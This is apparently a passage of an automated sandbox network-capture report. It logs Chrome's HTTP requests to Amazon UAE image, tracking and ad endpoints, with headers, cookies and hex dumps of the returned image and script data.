                                                                                                                                                                                                        2024-08-15 13:38:04 UTC16384INData Raw: b6 55 c8 cc 4c 3a 74 e9 d3 a7 4e 9d 3a 74 e9 d3 a7 4e 9f c8 fe a9 99 61 dd 35 68 7a d4 f7 50 a5 dd b4 9b fa a3 db fc 8f ea 99 97 3d d3 0c 0b 41 89 81 ee 83 bb d3 69 aa 52 22 43 b6 f9 1f 12 c0 c5 fa ab bf 0c c6 5f 86 63 2f c3 31 97 e1 98 cb f0 cc 65 f8 66 32 fc 33 19 7e 19 8c bf 0c c6 5f 86 63 2f c3 31 97 e1 98 cb f0 cc 65 f8 66 32 fc 33 19 7e 19 8c bf 0c c6 5f 86 63 2f c3 31 96 bb a5 c7 4f bb c0 49 6e ed 09 98 1d 6e 90 2c ee 87 bc 69 57 f5 c7 b6 f9 1f 12 d0 bf e5 ac 5d 4c db 65 79 dd 57 63 65 59 90 b1 35 03 92 b3 32 6c a4 cb 2a d3 2c 7c bf 56 ba 35 13 38 1c bb 61 58 d4 62 67 1c fb 1a 79 d6 15 56 5f a9 66 76 59 c7 17 66 4a ba be b5 d6 5e 74 a9 b2 2e db cf fe 4f 80 d8 7b bc ab fa 9c 60 5f b9 80 a5 de 2a b4 d5 29 31 ed be 47 c4 b4 2f f9 6a 9d 2c c2 50 d2 84
                                                                                                                                                                                                        Data Ascii: UL:tN:tNa5hzP=AiR"C_c/1ef23~_c/1ef23~_c/1OInn,iW]LeyWceY52l*,|V58aXbgyV_fvYfJ^t.O{`_*)1G/j,P
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC16384INData Raw: b5 45 46 12 6b ba b6 5b 8d e9 2a 59 cf 5d d5 1e 25 1e dc c7 b2 7c 1f 33 66 73 7b b2 6f 9b c3 ea ce ce 30 f7 e9 ff 00 d8 98 86 d0 62 35 9d 52 54 75 67 d5 fa 1b 2a 85 64 0b 6a c7 39 44 9c 03 cb 56 9c 8f c8 56 44 76 ad f3 95 1f 43 82 83 de 0b 3c 1f 2e ee af e5 e1 8a 55 1d 8c 54 38 49 f0 ce e9 b4 13 fc a6 2f 8f d4 97 2b d1 c5 bd ae a0 6d 3a b2 c2 1a ad d9 5a 21 1f bd 50 ee 7a 8c ac 0e fb fa 3d ba 67 cb 1c dc 4b 3b 5c 1f 16 ac 7b cb 86 21 d8 43 2d 39 28 e1 1e 94 3a ec 0b 5c a2 c3 bd e4 5f 0d a5 33 f5 a1 63 17 d3 d5 c4 c9 17 56 8c 76 6d f3 55 86 2c 4f 21 58 60 c3 ff 00 61 28 11 9f 30 7c 95 60 4f 15 f9 22 45 e5 2b ad 85 ef 0b cd 19 94 71 0f 64 1b d2 ed 14 aa 95 4a a5 52 ab b0 82 67 de d6 e0 f8 6e f7 65 d2 61 b7 a8 c7 8d 9c ce 56 16 cd fc 35 43 c9 ee c7 ce 56 9c
                                                                                                                                                                                                        Data Ascii: EFk[*Y]%|3fs{o0b5RTug*dj9DVVDvC<.UT8I/+m:Z!Pz=gK;\{!C-9(:\_3cVvmU,O!X`a(0|`O"E+qdJRgneaV5CV
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC7957INData Raw: 83 a5 6b fe a5 30 ff 00 72 9f 5e bf ea 93 7f 41 3e bd 7f d5 26 fe 82 7d 7a d1 cc e4 3f ee 57 eb d0 12 73 09 59 31 da 02 25 04 8e c8 ba e3 85 2b b6 f1 0e 7b e4 af cd ab 3c 5a 1d 08 61 de a5 9a 2f 67 22 dc bd cc 75 af 9a df 11 de a1 f3 fe 0e 01 1d df 98 32 80 76 27 3f b0 df 01 53 a8 8c 29 9b 99 41 2c d8 cb b0 b1 10 aa 88 a8 aa cb 83 1d d8 dd 7d 5f f3 2e 6d aa 8e 6e 5d 95 39 82 12 e9 56 63 65 ac 45 d0 f0 ed bd 64 42 bb ed e3 2d 9d 6a 9b 23 2e 5c c0 56 36 91 2f 20 dc a9 69 96 ef 01 e3 57 4f 12 84 81 4c b0 b6 0c b8 1c 01 04 62 a6 ed 56 b5 62 63 68 9c 0d 58 68 d1 db ac 78 c1 5b b2 08 ec 74 50 11 c8 24 07 58 18 7f 89 ab e1 9b 1c 06 a0 c3 01 dc b4 d1 69 8a 92 14 8c 49 c3 4f 70 ae ed 2b f2 e8 8a e7 99 92 62 03 2e 11 88 fd 79 06 5d 1e d2 de 1d de 35 2c 69 38 46 68
                                                                                                                                                                                                        Data Ascii: k0r^A>&}z?WsY1%+{<Za/g"u2v'?S)A,}_.mn]9VceEdB-j#.\V6/ iWOLbVbchXhx[tP$XiIOp+b.y]5,i8Fh


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        62192.168.2.44983054.78.35.1964434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:03 UTC557OUTGET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:XRRBVETR66S3T97BM5KF$uedata=s:%2Frd%2Fuedata%3Fstaticb%26id%3DXRRBVETR66S3T97BM5KF:0 HTTP/1.1
                                                                                                                                                                                                        Host: fls-eu.amazon.ae
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC176INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:03 GMT
                                                                                                                                                                                                        Content-Type: image/gif
                                                                                                                                                                                                        Content-Length: 43
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        x-amzn-RequestId: 134426e2-8aa0-46cc-92a6-59d756bb86a9
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 00 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                                                                                                                                                        Data Ascii: GIF89a!,L;


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        63192.168.2.449837151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:03 UTC683OUTGET /images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-NDZjYTNkNGMt-w186._SY116_CB642007526_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:03 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 3095
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: f6315f65-4ea2-4927-9fa4-9bd039da565c
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 06 Sep 2021 13:15:56 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Fri, 28 Aug 2043 19:18:42 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 1725437
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:03 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kiad7000119-IAD, cache-nyc-kteb1890088-NYC
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:03 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 84 00 03 02 02 03 02 02 03 03 03 03 04 03 03 04 05 08 05 05 04 04 05 0a 07 07 06 08 0c 0a 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 32 00 01 00 03 01 01 01 01 01 00 00 00 00 00 00 00 00 00 07 08 09 06 05 04 01 03 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 d4 00 00 00 00 1f 94 4e db da 24 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: JFIFt"2N$
                                                                                                                                                                                                        2024-08-15 13:38:03 UTC1378INData Raw: 17 b7 2c 65 50 64 9d 0e cd 64 7c b6 92 2a 85 22 b6 3a 93 fc 17 99 af 60 59 97 ab 31 81 b1 90 6e 48 b9 f2 75 9a 3a 74 cf de a2 98 42 48 6f 09 d4 af 28 42 bb 8f 8e 2e 05 b7 1b 77 62 aa 39 3a 59 95 46 be 12 ca 40 15 b0 df 48 a9 50 36 bd c6 97 03 65 6b 70 0c be 4c e5 32 ec a6 8e 5a c9 b4 f8 cc a8 85 b4 af 7b 1b 58 0e 64 81 82 06 7d 9d 54 55 e6 55 32 27 1e b2 57 eb 24 df 88 bb 39 fb f1 2e 8c e7 26 94 d4 53 a1 6d 2b 53 17 f7 b4 ef de ae b7 1e 82 41 1b 81 89 0c 99 6e 6b 4c 95 30 eb d9 96 e3 74 61 c9 94 dd 48 e4 54 fe ca 9a 7a b9 e8 9b 45 44 2a 6e d1 b5 81 37 17 1e 70 07 b8 ed c7 14 54 cc b6 b9 69 15 85 bd 7d ac 66 14 35 d3 52 56 cd 41 58 94 12 6a 58 26 8d 88 d2 77 27 71 a5 81 bd 88 60 47 90 c8 61 cb b3 0c e6 9e 1a f7 b1 b1 89 15 e6 55 24 70 bc 91 47 c7 8d ad cf
                                                                                                                                                                                                        Data Ascii: ,ePdd|*":`Y1nHu:tBHo(B.wb9:YF@HP6ekpL2Z{Xd}TUU2'W$9.&Sm+SAnkL0taHTzED*n7pTi}f5RVAXjX&w'q`GaU$pG
                                                                                                                                                                                                        2024-08-15 13:38:03 UTC339INData Raw: 22 36 fe 7e 38 2e 76 8d 6f 49 8c fe 9f 26 e5 54 8d d4 73 c5 1a 55 43 7b 98 e5 24 a9 f5 8e 07 19 0e 5b 11 fa 34 a9 fa 62 14 89 47 24 50 07 f4 60 49 d0 f1 57 17 18 c8 68 a5 20 df b5 1e 3a 3d 46 59 78 5a 2d 47 ef c7 c1 66 71 d2 6c 8a be 82 2a 7a 3a cc 91 24 69 10 21 93 b0 d0 88 9b 71 ac 58 86 b1 03 97 01 f0 25 f0 80 16 46 6d 2b 3e 4b 3c 63 7f a5 d5 9b 63 27 9b 21 cd 33 ec cb c2 93 2c 97 b4 f4 f0 aa d9 7a c6 1b 6a 24 b6 c3 80 b7 3e 1e 5d ff c4 00 22 11 00 02 01 03 04 02 03 00 00 00 00 00 00 00 00 00 00 01 02 11 30 31 03 10 12 20 13 41 21 40 51 ff da 00 08 01 02 01 01 3f 00 eb 4a dc 8a 1a b7 a6 aa 89 47 6f 8f 56 74 b2 c9 60 6a d6 96 49 3d a5 da 95 38 b1 40 72 4b 05 6a 4f d3 25 d9 49 24 79 1f e0 e4 e5 9d 94 a8 72 25 f4 3f ff c4 00 22 11 01 00 01 02 06 02 03 00
                                                                                                                                                                                                        Data Ascii: "6~8.voI&TsUC{$[4bG$P`IWh :=FYxZ-Gfql*z:$i!qX%Fm+>K<cc'!3,zj$>]"01 A!@Q?JGoVt`jI=8@rKjO%I$yr%?"


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        64192.168.2.449836151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:03 UTC683OUTGET /images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-NGI2NmQ3NTEt-w186._SY116_CB642007527_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:03 UTC659INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 3097
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: 846011c0-086e-4064-8741-ae5e15c3922e
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Mon, 06 Sep 2021 13:15:56 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Sun, 02 Aug 2043 11:07:08 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 1389881
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:03 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kjyo7100037-IAD, cache-ewr-kewr1740074-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:03 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 06 06 06 06 07 06 07 08 08 07 0a 0b 0a 0b 0a 0f 0e 0c 0c 0e 0f 16 10 11 10 11 10 16 22 15 19 15 15 19 15 22 1e 24 1e 1c 1e 24 1e 36 2a 26 26 2a 36 3e 34 32 34 3e 4c 44 44 4c 5f 5a 5f 7c 7c a7 01 06 06 06 06 07 06 07 08 08 07 0a 0b 0a 0b 0a 0f 0e 0c 0c 0e 0f 16 10 11 10 11 10 16 22 15 19 15 15 19 15 22 1e 24 1e 1c 1e 24 1e 36 2a 26 26 2a 36 3e 34 32 34 3e 4c 44 44 4c 5f 5a 5f 7c 7c a7 ff c2 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 05 07 04 06 08 03 02 09 01 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 02 03 01 04 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ea 00 00 00 18 d8 7c d5 44 9f a3 7e b5
                                                                                                                                                                                                        Data Ascii: JFIF""$$6*&&*6>424>LDDL_Z_||""$$6*&&*6>424>LDDL_Z_||t"5|D~
                                                                                                                                                                                                        2024-08-15 13:38:03 UTC1378INData Raw: 09 6b 7a 56 01 3e 49 e8 6a 3b 2e b1 ab f4 bb 0e ab 2b 46 9b 58 57 4c 75 dc 3c 32 7e 8e 25 5a ae b6 9b e3 da 8a 04 5e 7b 32 a2 29 99 40 a4 ad 23 70 09 5e e0 3b 85 0a 77 5a ce 53 2d a3 2d e5 a9 4b 7d 0e 25 d5 27 0b 56 3b 81 e5 8e 95 c2 ad 3b 74 bb 5e 62 ea 8b 9c 44 47 66 1c 11 1a 10 08 2d f3 97 d4 17 b6 fd 0c fb a7 e7 ed ad 37 b4 5a 2d 57 a5 97 0a 0b d7 97 90 95 e3 3b 48 19 a4 eb 69 64 82 e5 e9 04 61 1d 03 3e 20 7a dd fc 0d 2f 59 cf 09 51 17 8d 89 21 5b 49 63 b1 38 db 47 5b bd e1 78 e9 bf 3d 5a eb b7 3d a9 9b 82 6e 5a f2 c9 29 03 a3 96 27 bf 73 b8 a5 64 1d b8 eb 8c e2 a5 dc 6d f0 cb 69 99 29 a6 79 99 d8 1c 3e f6 08 1d 3f 5d 3a c7 0f 5f 92 24 a9 ab 4a dd 2a 03 72 50 93 95 1f c2 2a 1d c6 dd 30 38 88 52 59 78 34 13 bc 34 ac 84 6e ed 43 25 5b 40 39 c6 71 4d 02
                                                                                                                                                                                                        Data Ascii: kzV>Ij;.+FXWLu<2~%Z^{2)@#p^;wZS--K}%'V;;t^bDGf-7Z-W;Hida> z/YQ![Ic8G[x=Z=nZ)'sdmi)y>?]:_$J*rP*08RYx44nC%[@9qM
                                                                                                                                                                                                        2024-08-15 13:38:03 UTC341INData Raw: 00 00 00 00 00 00 00 01 02 03 00 04 11 05 12 21 06 13 31 30 41 51 20 22 40 52 71 72 81 91 ff da 00 08 01 03 01 01 3f 00 f5 dd d1 17 73 b0 51 f2 4e 2a f3 a9 23 80 37 65 22 97 0f 81 f7 11 c6 3c d5 9d fd bd da 29 49 63 2f 80 59 15 b3 83 e9 5d 9d fa a6 d6 27 11 da 77 10 7c 31 24 66 ae ef 1a 3b a9 63 04 6d 56 e0 56 88 12 e2 6e e7 22 44 75 da ca 70 45 45 33 3b 30 31 95 00 79 a0 41 f0 7d 0d 4e ca 1b ab ab 34 72 cb 9d e0 b2 1c 36 00 ce 29 ba 4b 48 62 4b 77 89 fe 55 0f 4f 58 58 cf 04 d0 19 72 25 1c 16 c8 34 fe 29 79 3e 86 ad 73 2d ab db 4f 12 a9 74 de 54 30 c8 24 e0 54 3d 45 ac 48 92 96 8e c5 36 2e e2 0a 7b 7f b5 61 af de 6a 33 84 9e 28 15 50 6f 1d b4 da 73 90 28 48 a4 79 a0 47 c8 a0 c0 9c 7d 7a a1 79 af 92 dd 59 57 10 6e 04 a8 71 97 38 e4 1f da af 2e 26 b6 9c c2
                                                                                                                                                                                                        Data Ascii: !10AQ "@Rqr?sQN*#7e"<)Ic/Y]'w|1$f;cmVVn"DupEE3;01yA}N4r6)KHbKwUOXXr%4)y>s-OtT0$T=EH6.{aj3(Pos(HyG}zyYWnq8.&


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        65192.168.2.44982518.165.191.1594434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:03 UTC421OUTGET /images/G/01/csm/showads.v2.js?category=ad&adstype=-ad-column-&ad_size=-housead- HTTP/1.1
                                                                                                                                                                                                        Host: m.media-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC1021INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: application/x-javascript
                                                                                                                                                                                                        Content-Length: 23
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        X-Amz-Ir-Id: 496f85dc-b50b-48dc-a8ef-40ebf23dcc58
                                                                                                                                                                                                        Last-Modified: Mon, 28 Nov 2016 08:22:04 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.com
                                                                                                                                                                                                        Edge-Cache-Tag: x-cache-479,/images/G/01/csm/showads.v2
                                                                                                                                                                                                        Surrogate-Key: x-cache-479 /images/G/01/csm/showads.v2
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 08:08:57 GMT
                                                                                                                                                                                                        Cache-Control: max-age=86400,public
                                                                                                                                                                                                        Expires: Thu, 15 Aug 2024 17:15:16 GMT
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Via: 1.1 a1822b92cbf5d3516743d4786d5b6020.cloudfront.net (CloudFront)
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        Age: 19916
                                                                                                                                                                                                        Server-Timing: cdn-cache-hit,cdn-pop;desc="ZRH55-P1",cdn-rid;desc="5r4T5gmLnar6xP08bAxdLqQnIHgUTx04PTAQg4Rb0XwXtt46zPgkEQ==",cdn-hit-layer;desc="REC",cdn-downstream-fbl;dur=11,provider;desc="cf"
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        X-Amz-Cf-Pop: ZRH55-P1
                                                                                                                                                                                                        X-Amz-Cf-Id: 5r4T5gmLnar6xP08bAxdLqQnIHgUTx04PTAQg4Rb0XwXtt46zPgkEQ==
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC23INData Raw: 77 69 6e 64 6f 77 2e 75 65 5f 61 64 62 5f 63 68 6b 20 3d 20 31 3b 0a
                                                                                                                                                                                                        Data Ascii: window.ue_adb_chk = 1;


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        66192.168.2.449831108.156.39.624434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:03 UTC1240OUTGET /af/feedback-link?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_desktop-ad-center-1_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlLz8%3D%22%2C%22slotName%22%3A%22desktop-ad-center-1%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DRN6H17wn-QSCi45d7vspX9sAAAGRVkJhBgMAAAIGAQBvbm9fdHhuX2JpZDMgICBvbm9fdHhuX2ltcDEgICDhmpvF%22%2C%22adCreativeId%22%3A%22577653937781864011%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D HTTP/1.1
                                                                                                                                                                                                        Host: www.amazon.ae
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; csm-hit=tb:s-XRRBVETR66S3T97BM5KF|1723729076586&t:1723729078244&adb:adblk_no; ubid-acbae=259-0026151-5947772
                                                                                                                                                                                                        2024-08-15 13:38:04 UTC1533INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: application/json;charset=UTF-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Server: Server
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:04 GMT
                                                                                                                                                                                                        Vary: Content-Type,Accept-Encoding,User-Agent
                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                        x-amz-rid: 989TD8QS39EET5K8MEDX
                                                                                                                                                                                                        set-cookie: session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY; Domain=.amazon.ae; Expires=Fri, 15-Aug-2025 13:38:04 GMT; Path=/; Secure
                                                                                                                                                                                                        Accept-CH-Lifetime: 86400
                                                                                                                                                                                                        content-security-policy-report-only: default-src 'self' blob: https: data: mediastream: 'unsafe-eval' 'unsafe-inline';report-uri https://metrics.media-amazon.com/
                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                        X-XSS-Protection: 1;
                                                                                                                                                                                                        Content-Security-Policy: upgrade-insecure-requests;report-uri https://metrics.media-amazon.com/
                                                                                                                                                                                                        Accept-CH: ect,rtt,downlink,device-memory,sec-ch-device-memory,viewport-width,sec-ch-viewport-width,dpr,sec-ch-dpr,sec-ch-ua-platform,sec-ch-ua-platform-version
                                                                                                                                                                                                        Strict-Transport-Security: max-age=47474747; includeSubDomains; preload
                                                                                                                                                                                                        X-Cache: Miss from cloudfront
                                                                                                                                                                                                        Via: 1.1 a6a1a17bbe377bf7c4423397c71959da.cloudfront.net (CloudFront)
                                                                                                                                                                                                        X-Amz-Cf-Pop: LHR50-P1
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                        X-Amz-Cf-Id: b_vr1KzI8wGi2JeiLOaRezHTCZjsyHMqGpOQK0htmqqPeS-5-7IX1A==
